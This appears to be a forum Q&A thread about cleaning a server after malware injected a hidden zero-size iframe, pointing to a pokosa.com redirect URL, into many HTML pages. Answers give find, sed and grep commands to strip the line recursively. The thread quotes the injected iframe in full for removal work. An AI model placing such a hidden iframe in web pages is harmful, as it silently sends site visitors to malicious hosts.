A malware has attacked my server and added the line
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
to many of my pages
how can i remove it with grep or if there is any other way i can remove it from all the files it affected
Edit: I saw the comments about using sed, but I need a recursive solution, if there is one
thanks
You can use find and sed to recursively find all files of interest and remove the offending line from them.
For example, the following command would remove the offending line from all .html files from the current directory and all its sub-directories.
find . -name "*.html" -exec sed -i 's/<iframe src="http:\/\/pokosa.com\/tds\/go.php?sid=1" width="0" height="0" frameborder="0"><\/iframe>//' {} \;
You can use sed to do replacement in files. Something like
$ sed -i.bak 's|<iframe src="http://pokosa.com.*</iframe>||' your-file
should do it for a single file. People traditionally use / as the separator, but that becomes cumbersome when you have many /s in your search string. Using | is easier then.
Combine sed with find and xargs to do the same for multiple files:
$ find /var/www -name "*.html" -print0 | xargs -0 sed -i.bak 's|<iframe ...>||'
The simplest approach would probably be with an inverted grep:
$ grep -v pokosa < input > output
You might want to make the output the same as the input with some extra suffix, then run some diff:s to verify that it's doing the right thing, before renaming over the input files.
